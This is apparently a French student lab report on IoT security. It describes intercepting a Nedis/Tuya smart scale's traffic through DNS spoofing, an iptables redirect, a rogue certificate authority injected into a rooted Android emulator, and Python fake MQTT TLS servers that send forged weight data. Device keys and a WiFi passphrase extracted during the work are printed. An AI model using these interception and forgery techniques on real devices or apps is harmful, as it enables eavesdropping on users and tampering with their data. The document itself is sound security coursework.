0020 - 76 62 47 39 53 42 00 00-04 00 ae 00 ff 01 00 00 vbG9SB..........
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c2410 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
</syntaxhighlight>On constate que dès que la balance tente de se connecter elle ferme la connexion pour cause "no shared cipher".

Malheureusement, je constate (un peu tard) que notre balance ne pourra pas communiquer avec notre serveur puisque qu'elle ne possède pas le certificat de notre autorité de certification. Elle refuse donc de communiquer avec notre serveur.

Il faudrait réussir un injecter le certificat dans la balance en communicant directement avec elle.

== Envoi de fausses informations vers l'application ==

Dans cette partie, nous allons tenter d'envoyer un poids à l'application depuis notre serveur.

L'appli tape sur 443 et 8883 (mqtt qui fonctionne avec tls) comme on peut le voir sur cet extrait:<syntaxhighlight lang="linux-config">
(test) root@SE5:~/py_file# tcpdump -i eth1 -n src 172.16.10.102 and not port 53

...

11:59:46.829382 IP 172.16.10.102.53314 > 172.16.10.1.443: Flags [.], ack 1257, win 251, length 0
11:59:47.005041 IP 172.16.10.102.54915 > 172.16.10.255.54915: UDP, length 263
11:59:47.295737 IP 172.16.10.102.53313 > 172.16.10.1.8883: Flags [S], seq 3014816869, win 65535, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
11:59:47.346713 IP 172.16.10.102.53315 > 172.16.10.1.443: Flags [S], seq 1755898328, win 65535, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
11:59:47.347853 IP 172.16.10.102.53315 > 172.16.10.1.443: Flags [.], ack 273869652, win 255, length 0
11:59:47.534641 IP 172.16.10.102.53318 > 172.16.10.1.443: Flags [F.], seq 547, ack 1257, win 251, length 0

...

11:59:48.189587 IP 172.16.10.102.53319 > 172.16.10.1.443: Flags [P.], seq 517:547, ack 1256, win 251, length 30
11:59:48.190681 IP 172.16.10.102.53319 > 172.16.10.1.443: Flags [.], ack 1257, win 251, length 0
11:59:48.256593 IP 172.16.10.102.53319 > 172.16.10.1.443: Flags [F.], seq 547, ack 1257, win 251, length 0
11:59:48.324124 IP 172.16.10.102.53313 > 172.16.10.1.8883: Flags [S], seq 3014816869, win 65535, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0

</syntaxhighlight>

On va donc tenter d'envoyer des informations erronés de notre serveur vers notre application.

Dans un premier temps on va tenter d'établir une connexion sécurisé entre l'appli et notre serveur.

Tuya utilise un protocole MQTT pour les échanges de données. On va donc simuler un serveur MQTT en python qui utilise un certificat signé par notre autorité de certification.<syntaxhighlight lang="python3">
import socket
import ssl

CERT_FILE = "/etc/apache2/ssl/tuya.crt"
KEY_FILE = "/etc/apache2/ssl/tuya.key"
PORT = 8883

def start_server():
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
try:
context.load_cert_chain(certfile=CERT_FILE, keyfile=KEY_FILE)
except Exception as e:
print(f"impossible de charger les clés SSL\n{e}")
return

bindsocket = socket.socket()
bindsocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
bindsocket.bind(('0.0.0.0', PORT))
bindsocket.listen(5)

print(f"faux Serveur MQTT en écoute sur le port {PORT}...")
print("en attente de l'application Android...")

while True:
try:
newsocket, fromaddr = bindsocket.accept()
print(f"\nconnexion TCP reçue de {fromaddr[0]}")

try:
conn = context.wrap_socket(newsocket, server_side=True)
print(f"handshake SSL réussi")

data = conn.recv(1024)
print(f"données reçues ({len(data)} octets) :")
print(data)

except ssl.SSLError as e:
print(f"échec SSL rejet du certificat.\n{e}")
except Exception as e:
print(f"erreur de lecture : {e}")
finally:
pass

except KeyboardInterrupt:
print("\narrêt.")
break

if __name__ == '__main__':
start_server()
</syntaxhighlight><syntaxhighlight lang="linux-config">
connexion TCP reçue de 172.16.10.102
handshake SSL réussi
données reçues (529 octets) :
b'\x10\x8e\x04\x00\x04MQTT\x04\xce\x00<\x00lcom.nedis.smartlife_mb_e5a1220d6003e352f8b34a81cda1f2bf2e2880ce4093_d8439672c8e94a0c3446d4276d3a2abc_DEFAULT\x00\x0ftuya/smart/will\x00\xfa{"clie
ntId":"com.nedis.smartlife_mb_e5a1220d6003e352f8b34a81cda1f2bf2e2880ce4093_d8439672c8e94a0c3446d4276d3a2abc_DEFAULT","deviceType":"ANDROID","message":"","userName":"e5a1220d6003e352f8b34a81
cda1f2bf2e2880ce4093_d8439672c8e94a0c3446d4276d3a2abc"}\x00up1027735_v1_4dtc78phe7grtfdfv7fp_a4206d71_mb_eu17623708062605mpDdzpA355dad9b8086f63442d98e227e039cf5315158b056398c8fb\x00\x10388c
a5a77b82c5ad'
</syntaxhighlight>On constate à la suite de cela que notre application fait totalement confiance à notre faux serveur. Il faut maintenant le format sous lequel envoyer notre message pour quelle ajoute un poids dans l'application.

On tente donc d'envoyer en clair le poids vers l'application de Nedis<syntaxhighlight lang="linux-config">
(test) root@SE5:~/py_file# cat fake_serv2.py
import socket
import ssl
import time
import json
import struct

# ================= CONFIGURATION =================
CERT_FILE = "/etc/ssl/apache/ssl/tuya.crt"
KEY_FILE = "/etc/ssl/apache/ssl/tuya.key"
PORT = 8883

PAYLOAD_POIDS = {
"protocol": 4,
"t": int(time.time()),
"data": {
"dps": {
"1": 8050,
"2": True,
"3": "kg"
}
}
}
# =================================================

def encode_remaining_length(length):
out = bytearray()
while True:
byte = length % 128
length //= 128
if length > 0:
byte |= 0x80
out.append(byte)
if length == 0:
break
return out

def create_mqtt_packet(pkt_type, flags, payload):
header = bytes([(pkt_type << 4) | flags])
return header + encode_remaining_length(len(payload)) + payload

def start_server():
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
context.load_cert_chain(certfile=CERT_FILE, keyfile=KEY_FILE)

sock = socket.socket()
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(("0.0.0.0", PORT))
sock.listen(5)

print(f"[*] Serveur MQTT TLS prêt sur {PORT}")

while True:
client, addr = sock.accept()
print(f"\n[+] Connexion de {addr[0]}")

try:
conn = context.wrap_socket(client, server_side=True)
print("TLS OK")

while True:
header = conn.recv(1)
if not header:
break

pkt_type = header[0] >> 4

# Remaining length
multiplier = 1
remaining_len = 0
while True:
b = conn.recv(1)[0]
remaining_len += (b & 127) * multiplier
multiplier *= 128
if not (b & 128):
break

payload = b""
while len(payload) < remaining_len:
payload += conn.recv(remaining_len - len(payload))

# ================= HANDLERS =================

# CONNECT
if pkt_type == 1:
print(">>> CONNECT reçu")
conn.send(b"\x20\x02\x00\x00")
print("<<< CONNACK envoyé")

# SUBSCRIBE
elif pkt_type == 8:
msg_id = payload[0:2]
topic_len = struct.unpack("!H", payload[2:4])[0]
topic = payload[4:4+topic_len].decode(errors="ignore")

print(f">>> SUBSCRIBE : {topic}")

# SUBACK (QoS 1 accepté)
suback_payload = msg_id + b"\x01"
conn.send(create_mqtt_packet(9, 0x00, suback_payload))
print("<<< SUBACK OK")

# Mapping OUT -> IN
pub_topic = topic.replace("/out/", "/in/")
print(f"Publication sur : {pub_topic}")

time.sleep(0.5)

json_payload = json.dumps(PAYLOAD_POIDS)
topic_bytes = pub_topic.encode()

var_header = struct.pack("!H", len(topic_bytes)) + topic_bytes
packet_payload = var_header + json_payload.encode()

# PUBLISH QoS 1
packet = create_mqtt_packet(3, 0x02, packet_payload)
conn.send(packet)

print(f"Payload envoyé (NON chiffré)")

# PINGREQ
elif pkt_type == 12:
conn.send(b"\xd0\x00")

else:
print(f"Packet MQTT type {pkt_type} ignoré")

except Exception as e:
print(f"Erreur connexion : {e}")

finally:
try:
conn.close()
except:
pass

if __name__ == "__main__":
start_server()

</syntaxhighlight>

On cherche dans le fichier shared_prefs situé dans /data/data/com.nedis.smartlife sur la VM android une clé local qui permettrai de chiffrer le message pour que Nedis l'accepte.<syntaxhighlight lang="linux-config">
emulator64_x86_64_arm64:/data/data/com.nedis.smartlife/shared_prefs # grep -r "localKey"

./sig_mesh_storage.xml: <string name="sig_mesheu176237y8062605m7Ddzpr3a6d803edeb314f364c55d2caab540918">[{"appkey":"2FC5C9F42A44F9D243F960231C370DC6","code":"mebf11e37fc6632a9b44qg","endTime":0,"ivIndex":0,"key":"mebf11e37fc6632a9b44qg","localKey":"674d29fb978a1705","meshId":"mebf11e37fc6632a9b44qg","meshKey":"2FC5C9F42A44F9D243F960231C370DC6","meshkey":"2FC5C9F42A44F9D243F960231C370DC6","name":"D8FBEEA2F2B93F4B63EFD7DA83424BA9","netWorkkey":"D8FBEEA2F2B93F4B63EFD7DA83424BA9","password":"fa1667ca872e46d4","pv":"2.1","resptime":0,"share":false,"startTime":0,"tempShare":false}]</string>
</syntaxhighlight>Je vais apprendre plus tard que cette clé est une clé qui permet de sécuriser l'échange Bluetooth entre la balance et le téléphone lors de la première connexion. Mais avant de le savoir, j'ai tenté d'améliorer le faux serveur avec cette clé.<syntaxhighlight lang="linux-config">
#!/usr/bin/env python3
import socket
import ssl
import time
import json
import struct
import base64
import hashlib
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad

# ================= CONFIG =================
CERT_FILE = "/etc/ssl/apache/ssl/tuya.crt"
KEY_FILE = "/etc/ssl/apache/ssl/tuya.key"
PORT = 8883

# LOCAL KEY 16 caractères
LOCAL_KEY = b"674d29fb978a1705"

# DPS balance (poids correct pour Nedis)
DPS_POIDS = {
"1": 8050, # 80.50 kg
"2": 1, # stable
"3": "kg"
}
# =========================================

# ---------- TUYA CRYPTO ----------
def tuya_encrypt(data: dict, local_key: bytes) -> str:
raw = json.dumps(data, separators=(',', ':')).encode()
cipher = AES.new(local_key, AES.MODE_ECB)
encrypted = cipher.encrypt(pad(raw, 16))
return base64.b64encode(encrypted).decode()

def tuya_sign(enc_data: str, ts: int, local_key: bytes) -> str:
s = f"data={enc_data}&t={ts}&key={local_key.decode()}"
return hashlib.md5(s.encode()).hexdigest()

def build_tuya_payload(dps: dict, device_id: str) -> dict:
ts = int(time.time())
enc = tuya_encrypt({
"devId": device_id,
"dps": dps
}, LOCAL_KEY)
sign = tuya_sign(enc, ts, LOCAL_KEY)
return {
"protocol": 4,
"t": ts,
"data": enc,
"sign": sign
}

def extract_device_id(topic: str) -> str:
return topic.split("/")[-1]

# ---------- MQTT UTILS ----------
def encode_remaining_length(length):
out = bytearray()
while True:
byte = length % 128
length //= 128
if length > 0:
byte |= 0x80
out.append(byte)
if length == 0:
break
return out

def create_mqtt_packet(pkt_type, flags, payload):
header = bytes([(pkt_type << 4) | flags])
return header + encode_remaining_length(len(payload)) + payload

# ---------- SERVER ----------
def start_server():
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
context.load_cert_chain(certfile=CERT_FILE, keyfile=KEY_FILE)

sock = socket.socket()
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(("0.0.0.0", PORT))
sock.listen(5)

print(f"[*] Serveur MQTT TLS Tuya prêt sur {PORT}")

published_topics = set()

while True:
client, addr = sock.accept()
print(f"\n[+] Connexion de {addr[0]}")

try:
conn = context.wrap_socket(client, server_side=True)
print("TLS OK")

while True:
header = conn.recv(1)
if not header:
break

pkt_type = header[0] >> 4

# Remaining length
multiplier = 1
remaining_len = 0
while True:
b = conn.recv(1)[0]
remaining_len += (b & 127) * multiplier
multiplier *= 128
if not (b & 128):
break

payload = b""
while len(payload) < remaining_len:
payload += conn.recv(remaining_len - len(payload))

# -------- HANDLERS --------
if pkt_type == 1: # CONNECT
print(">>> CONNECT")
conn.send(b"\x20\x02\x00\x00") # CONNACK OK

elif pkt_type == 8: # SUBSCRIBE
msg_id = payload[0:2]
topic_len = struct.unpack("!H", payload[2:4])[0]
topic = payload[4:4+topic_len].decode(errors="ignore")

print(f">>> SUBSCRIBE : {topic}")
conn.send(create_mqtt_packet(9, 0x00, msg_id + b"\x01")) # SUBACK QoS 1

# Publication automatique
device_id = extract_device_id(topic)
tuya_payload = build_tuya_payload(DPS_POIDS, device_id)
json_payload = json.dumps(tuya_payload)

topic_bytes = topic.encode()
var_header = struct.pack("!H", len(topic_bytes)) + topic_bytes
packet_payload = var_header + json_payload.encode()

# PUBLISH QoS 1
packet = create_mqtt_packet(3, 0x02, packet_payload)
time.sleep(0.5)
conn.send(packet)
print("POIDS TUYA CHIFFRÉ ENVOYÉ")

elif pkt_type == 4: # PUBACK
print("<<< PUBACK")

elif pkt_type == 10: # UNSUBSCRIBE
msg_id = payload[0:2]
conn.send(create_mqtt_packet(11, 0x00, msg_id))
print("<<< UNSUBACK")

elif pkt_type == 12: # PINGREQ
conn.send(b"\xd0\x00")

else:
print(f"MQTT type {pkt_type} ignoré")

except Exception as e:
print(f"Erreur : {e}")

finally:
try:
conn.close()
except:
pass

if __name__ == "__main__":
start_server()

</syntaxhighlight>Je pense que pour faire fonctionner cette méthode, il faut absolument que je trouve la clé qui crypte le message pour que Nedis l'accepte quand il le reçoit

J'ai donc cherché dans cette direction et j'ai découvert deux choses.

Premièrement, TinyTuya, une API Python pour les appareils intelligents Tuya (génial, Nedis utilise Tuya) WiFi utilisant une connexion directe au réseau local (LAN) ou le cloud (API TuyaCloud). TinyTuya permet entre autre de récupérer la fameuse clé.

Ensuite, j'ai découvert la plateforme IOT de Tuya qui permet, en connectant son application de téléphone sur le site, de jouer avec ses appareils Tuya pour une connexion avec Home Assisant ou encore ... TinyTuya !

Spoiler alerte: J'ai du changer d'application et cette application ne tape plus sur la même adresse. Elle tape sur XX-eu.lifeaiot.com il a donc fallu refaire une redirection vers notre serveur pour ces nouvelles adresses.

Spoiler alerte: j'ai la clé. Je parle plus de TinyTuya dans la prochaine partie car même avec cette clé, ce faux serveur ne marche pas. Je vais donc tenter d'autres pistes.

== TinyTuya ==
Dans cette partie, nous allons tenter de connecter notre balance à notre faux serveur en utilisant l'utilitaire TinyTuya. Le but est de récupérer le poids de l'utilisateur de la balance lorsqu'il se pèse.

Dans un premier temps il a fallu connecter l'appli à la platforme IOT de Tuya. L'application "Nedis Smartlife" de Nedis, qui utilise bien la même base que l'application Smartlife de Tuya (oui oui c'est le même nom…) ne veux pas se connecter à la plateforme pour une raison inexplicable (et au vu du nombre de forum qui parle du sujet, je ne suis pas le seul).

J'ai donc du connecter ma balance sur l'appli Smartlife qui a bien voulu se connecter à la plateforme.

Cela me permet de récupérer avec TinyTuya les périphériques

Et je vais maintenant tenter d'expliquer le fonctionnement de TinyTuya étape par étape…

Déjà pourquoi connecter l'application avec la plateforme IOT de Tuya --> Cela permet à l'appli de récupérer les appareils connectés de mon application, elle va générer un ID et une clé.

Et comment faire pour que TinyTuya est accès aux appareils --> grâce à la commande <code>python -m tinytuya wizard</code> qui va prendre l'ID et la clé pour récupérer les appareils.

Ensuite la commande suivante va permettre à TinyTuya de détecter nos appareils qui sont effectivement connecté à notre réseau :<syntaxhighlight lang="linux-config">
(test) root@SE5:~/py_file# python3 -m tinytuya devices TinyTuya
(Tuya device scanner) [1.17.4] Loaded devices.json - 1 devices: Device Listing [
{
"name": "P\u00e8se pas que des personnes",
"id": "84853100a4e57c162d4c",
"key": "V[z^Gr|qekh]9z_>",
"mac": "a4:e5:7c:16:2d:4c",
"uuid": "84853100a4e57c162d4c",
"sn": "10003702800241",
"category": "qt",
"product_name": "Personal Scale",
"product_id": "arjciqapuueq9cvt",
"biz_type": 18,
"model": "WIFIHS10WT",
"sub": false,
"icon": "https://images.tuyaeu.com/smart/icon/ay1513237774906SMBA3/1652104387fa2f735a389.png",
"mapping": {} } ]
</syntaxhighlight>Et la, magie, on obtient la clé de la balance, on va pouvoir enfin récupérer le poids de notre utilisateur grâce à ce code python qui écoute la balance:<syntaxhighlight lang="python">
import tinytuya

DEVICE_ID = '84853100a4e57c162d4c'
IP_ADDRESS = '172.16.10.105'
LOCAL_KEY = 'V[z^Gr|qekh]9z_>'

# Connexion à l'appareil
d = tinytuya.Device(DEVICE_ID, IP_ADDRESS, LOCAL_KEY)

d.set_version(3.3)

# Récupérer le statut
data = d.status()
print("Statut complet :", data)
</syntaxhighlight>Évidemment cela ne fonctionne pas. Et pourquoi ? Et bien si l'on regarde dans le bloc <code>python3 -m tinytuya devices TinyTuya</code> on observe que le champs mapping est vide. Ce champs est censé afficher toute les données que TinyTuya est censé pouvoir récupérer … et il est vide …

Soit je suis à l'origine de ce problème, soit TinyTuya ne permet de changer nous ampoules connecté en rouge si la balance affiche que notre objectif de poids est dépassé …

Affaire à suivre.

TODO : ne marche pas en local ? tenter d'enlever la redirection

SE5 IdO sécurité des objets 2025/2026 b1

2026-01-11T22:07:10Z

Vdetrez :

[[Fichier:1107px-Titre page.png|sans_cadre|820x820px]]

= Serveur virtuel (17/09) =
Dans un premier temps, on vient créer un serveur virtuel sur <code>capbreton</code> avec la commande <code>xen-create-image --hostname=SE5.vdetrez --dhcp --dir=/usr/local/xen --size=10G --memory=2G --dist=daedalus --bridge=bridgeStudents</code>

Ensuite, sur capbreton dans le dossier <code>/etc/network/interfaces.d</code> on vient créer un fichier <code>g1_vdetrez</code> pour mettre en place une nouvelle interface dans le VLAN 410. <syntaxhighlight lang="linux-config">
auto Trunk.410
iface Trunk.410 inet manual
vlan-raw-device Trunk
up ip link set $IFACE up
down ip link set $IFACE down

auto g1_vdetrez
iface g1_vdetrez inet manual
bridge_ports Trunk.410
up ip link set $IFACE up
down ip link set $IFACE down

</syntaxhighlight>

On a maintenant accès à la machine SE5.vdetrez (en ayant évidemment fait l'erreur de mettre "." à la place de "-") et on vient y configurer nos adresses IPv4.

Mon adresse IPv4 routée est la <code>172.26.145.100</code> et mon IPv4 dans le VLAN 410 est <code>172.16.10.0</code> <syntaxhighlight lang="linux-config">
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).

# The loopback network interface
auto lo
iface lo inet loopback

# The primary network interface
auto eth0
iface eth0 inet static
address 172.26.145.110
netmask 255.255.255.0
gateway 172.26.145.251
# post-up ethtool -K eth0 tx off

auto eth1
iface eth1 inet static
address 172.16.10.0/24
#
# The commented out line above will disable TCP checksumming which
# might resolve problems for some users. It is disabled by default
#

</syntaxhighlight>

On vérifie avec la commande <code>ip a</code><syntaxhighlight lang="linux-config">
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:16:3e:23:74:41 brd ff:ff:ff:ff:ff:ff
inet 172.26.145.110/24 brd 172.26.145.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 2001:660:4401:6050:216:3eff:fe23:7441/64 scope global dynamic mngtmpaddr
valid_lft 853sec preferred_lft 753sec
inet6 2a01:c916:2047:c850:216:3eff:fe23:7441/64 scope global dynamic mngtmpaddr
valid_lft 2591853sec preferred_lft 604653sec
inet6 fe80::216:3eff:fe23:7441/64 scope link
valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:16:3e:23:74:42 brd ff:ff:ff:ff:ff:ff
inet 172.16.10.0/24 brd 172.16.10.255 scope global eth1
valid_lft forever preferred_lft forever
inet6 fe80::216:3eff:fe23:7442/64 scope link
valid_lft forever preferred_lft forever

</syntaxhighlight>

Et on constate que notre serveur a accès à Internet avec la commande <code>ping 8.8.8.8</code>

= Point d'accès WiFi (29/09) =
Pour l'instant, nous mettons de côté ce point du TP car il n'est pas utile pour la suite.

= Sécurisation WiFi par WPA2-PSK =

Pour communiquer avec le routeur <code>Cisco</code>, on branche le port série en USB et on se connecte avec la commande <code>minicom -D /dev/ttyUSB0 -b 9600</code>. La première étape fut la création du SSID <code>SE5-SSID10</code>.<syntaxhighlight lang="linux-config">
dot11 ssid SE5-SSID10

vlan 410

authentication open

authentication key-management wpa version 2

wpa-psk ascii Cisco2025

exit
</syntaxhighlight>
Puis, on configure l'interface <code>Dot11Radio0</code><syntaxhighlight lang="linux-config">
interface dot11radio 0

encryption mode ciphers aes-ccm

ssid SE5-SSID10

station-role root

no shutdown
</syntaxhighlight>Après cela, on retourne sur notre serveur virtuel et on y implémente un serveur DHCP pour l'attribution des IP aux machines se connectant sur le routeur. On retrouve cette configuration dans <code>/etc/dhcp/dhcpd.conf</code><syntaxhighlight lang="linux-config">
# dhcpd.conf

option domain-name "plil.info";
option domain-name-servers ns.plil.info;

default-lease-time 600;
max-lease-time 7200;

ddns-update-style none;

authoritative;

subnet 172.16.10.0 netmask 255.255.255.0 {
range 172.16.10.100 172.16.10.200;
option domain-name-servers 172.16.10.1;
option routers 172.16.10.1;
default-lease-time 600;
max-lease-time 7200;
}
</syntaxhighlight>Puis, on implémente un serveur DNS minimal dans le fichier <code>/etc/bind/named.conf.options</code><syntaxhighlight lang="linux-config">
options {
directory "/var/cache/bind";

recursion yes;
allow-query {172.16.10.0/24; 127.0.0.1;};

forwarders {
8.8.8.8;
1.1.1.1;
};

dnssec-validation auto;

listen-on {127.0.0.1; 172.16.10.1;};
listen-on-v6 { none; };
};
</syntaxhighlight>Et enfin, on met en place une mascarade entre le VLAN 410 et le routeur du réseau des salles de projets pour donner l'accès à Internet.<syntaxhighlight lang="linux-config">
Chain PREROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain INPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain OUTPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain POSTROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
385 133K MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
0 0 MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
</syntaxhighlight>

= Interception de flux (30/09) =

== Redirection par DNS ==
Pour cette partie, on va ajouter une zone primaire à notre serveur DNS avec le nom Internet du site que l'on veut rediriger vers notre machine.

Ici, ce sera le merveilleux <code>moodle.com</code>

D'abord, on modifie <code>/etc/bind/named.conf.local</code><syntaxhighlight lang="linux-config">
//
// Do any local configuration here
//

// Consider adding the 1918 zones here, if they are not used in your
// organization
//include "/etc/bind/zones.rfc1918";

zone "moodle.com" {
type master;
file "/etc/bind/db.moodle.com";
};
</syntaxhighlight>Puis, on crée la fameuse zone <code>db.moodle.com</code> dans le même répertoire <syntaxhighlight lang="linux-config">
$TTL 200
@ IN SOA ns.moodle.com. admin.moodle.com. (
5 ;
3600 ;
1800 ;
604800 ;
86400 ;
)
IN NS ns.moodle.com.
ns IN A 172.16.10.1
@ IN A 172.16.10.1
www IN CNAME ns
</syntaxhighlight>Pour vérifier si notre configuration est correcte, on exécute ces deux commandes :

<code>sudo named-checkconf</code>

<code>sudo named-checkzone moodle.com /etc/bind/db.moodle.com</code>

== Redirection réseau ==
Dans cette partie, on ajoute une règle <code>iptables</code> pour rediriger le flux TCP vers un port local, le <code>8080</code>.

<code>iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-ports 8080</code><syntaxhighlight lang="linux-config">
Chain PREROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
0 0 REDIRECT 6 -- eth0 * 0.0.0.0/0 0.0.0.0/0 tcp dpt:80 redir ports 8080

Chain INPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain OUTPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain POSTROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
385 133K MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
0 0 MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
</syntaxhighlight>

== Serveur apache sécurise (04/10) ==

Dans un premier temps, on va créer un certificat auto-signé :

<code>openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout /etc/ssl/apache/apache-selfsigned.key -out /etc/ssl/apache/apache-selfsigned.crt -subj "/C=FR/ST=Nord/L=Lille/O=Popo/CN=moodle.com"</code>

Puis, on configure <code>Apache2</code>
<syntaxhighlight lang="linux-config">
GNU nano 7.2 /etc/apache2/sites-available/secure-site.conf
<VirtualHost *:443>
ServerName moodle.com

DocumentRoot /var/www/html

SSLEngine on
SSLCertificateFile /etc/ssl/apache/apache.crt
SSLCertificateKeyFile /etc/ssl/apache/apache.key

# Optionnel : log
ErrorLog ${APACHE_LOG_DIR}/ssl-error.log
CustomLog ${APACHE_LOG_DIR}/ssl-access.log combined
</VirtualHost>

# Redirection HTTP ^f^r HTTPS
<VirtualHost *:80>
ServerName moodle.com
Redirect permanent / https://moodle.com/
</VirtualHost>
</syntaxhighlight>

Maintenant, en prévision de la suite (voir explication dans Machine virtuelle Android), on va créer une autorité de certification nommée CertiFiable :

<code>openssl req -x509 -new -nodes -keyout ca.key -sha256 -days 365 -out ca.crt -subj "/CN=CertiFiable"</code>

Puis, on vient générer une demande de signature de certificat :

<code>openssl req -new -newkey rsa:2048 -nodes -keyout apache.key -out apache.csr -subj "/CN=moodle.com"</code>

Enfin, on vient signer le site avec le certificat de CertiFiable :

<code>openssl x509 -req -in apache.csr -CA ca.crt -CAkey ca.key -CAcreateserial -out apache.crt -days 365 -sha256</code>

= Machine virtuelle <code>android</code> =

== Première tentative ==
Actuellement, si on navigue sur internet et que l'on se rend sur moodle.com, on atterrit bien sûr le faux Moodle, mais comme le téléphone ne connait pas l'autorité de certification nommé CertiFiable, on a le droit à ce magnifique message de connexion non sécurisée :

[[Fichier:Avertissement moodle.png|sans_cadre]][[Fichier:Moodle le magnifique.png|sans_cadre]]

Malheureusement, il est aujourd'hui impossible d'ajouter facilement une autorité de certification sur son téléphone.

C'est pour cela qu'une solution proposée est d'installer une machine virtuelle d'une ancienne version d'<code>Android</code> où il était possible d'en ajouter.

En ayant suivi ce tuto (https://help.clouding.io/hc/en-us/articles/4405454393756-How-to-virtualize-Android-with-QEMU-KVM), j'ai réussi à installer une VM sur Zabeth4 (j'ai dû prendre une autre iso car celle du site était inaccessible).

J'ai installé <code>VNC Viewer</code> pour pouvoir manipuler la machine virtuelle.

En étant sur la VM, j'ai pu me rendre compte qu'il n'était pas possible de se connecter au WiFi, c'est la connexion du pc qui est simulé comme un réseau WiFi dans la VM.

J'ai pu réfléchir à deux solutions avant que la VM ne crash d'elle-même et soit impossible à redémarrer...

La première est toute simple, connecter la Zabeth directement au WiFi, ce qui est difficile à distance. La seconde, qui est je pense possible, est de changer la carte réseau dans les fichiers de conf de la VM pour mettre celle supportant le WiFi.

Je n'ai donc pu tester aucune de ces deux solutions, la VM n'étant plus.

== Seconde tentative ==

Pour cette seconde tentative, j'utilise les commandes suivantes avec plusieurs ISO Android.<syntaxhighlight lang="linux-config">
qemu-system-x86_64 -net nic -net user -m 1024 -enable-kvm -display sdl -drive file=android.img,format=raw
qemu-system-x86_64 -net nic -net user -m 1024 -enable-kvm -display sdl -drive file=android.img,format=raw -cdrom *android-x86*.iso -boot d
qemu-system-x86_64 -m 2048 -enable-kvm -cpu host -smp 2 -display sdl -drive file=android.img,format=raw,if=virtio -usb -device usb-host,vendorid=0x148f,productid=0x5370
</syntaxhighlight>J'ai pu donc pu faire face:

- À un ISO sans les services Google et sans navigateur ...

- Un trop ancien pour Nedis

- Un qui refuse l'installation d'APK

- Un trop récent pour l'installation de certificat.

- Un qui refuse de se laisser root

En fin de séance, je n'ai malheureusement pas de VM Android fonctionnelle.

== Ultime tentative (qui marche) ==
Cette fois ci j'utilise l'application Android Studio qui permet d'émuler des téléphones Android pour le débogage d'application. On va donc s'en servir pour créer un Android routé qui va recevoir notre certificat.

Dans un premier temps j'ai donc routé mon téléphone avec l'utilitaire Magisik en suivant ce tutoriel : https://www.youtube.com/watch?v=QzsNn3GhYYk&t=374s.

Puis je viens ajouter un module dans Magisk qui permet de recharger à chaque demarrage du téléphone le certificat en question.

Le certificat peut être ajouter dans le téléphone en utilisant la commande <code>adb push xyzxyzxyz.0</code> .

La manipulation est la suivante :<syntaxhighlight lang="linux-config">
adb shell
su
cd /data/adb/modules/
mkdir -p tuya_cert/system/etc/security/cacerts
echo "id=tuya_cert" > tuya_cert/module.prop echo "name=Tuya Certificate Injection" >> tuya_cert/module.prop echo "version=1.0" >> tuya_cert/module.prop echo "versionCode=1" >> tuya_cert/module.prop echo "author=Victo" >> tuya_cert/module.prop echo "description=Injecte le certificat Tuya dans le systeme" >> tuya_cert/module.prop
touch tuya_cert/auto_mount
cp /sdcard/Download/26e33623.0 /data/adb/modules/tuya_cert/system/etc/security/cacerts/
chmod 644 /data/adb/modules/tuya_cert/system/etc/security/cacerts/26e33623.0
chown root:root /data/adb/modules/tuya_cert/system/etc/security/cacerts/26e33623.0
reboot
</syntaxhighlight>On a donc maintenant une VM Android avec notre certificat. Il faut maintenant que le PC qui host cette VM soit connecté à notre borne WiFi pour pouvoir constater que notre site Moodle.com est bien redirigé et sécurisé.

= Machine <code>Android</code> (06/10) =
Pour cette dernière partie, j'ai retrouvé une tablette sous <code>Android 4.4 KitKat</code> qui permet d'ajouter des autorités de certification.

C'est donc ce que j'ai fait :

[[Fichier:Photo_certifiable.png|sans_cadre]]

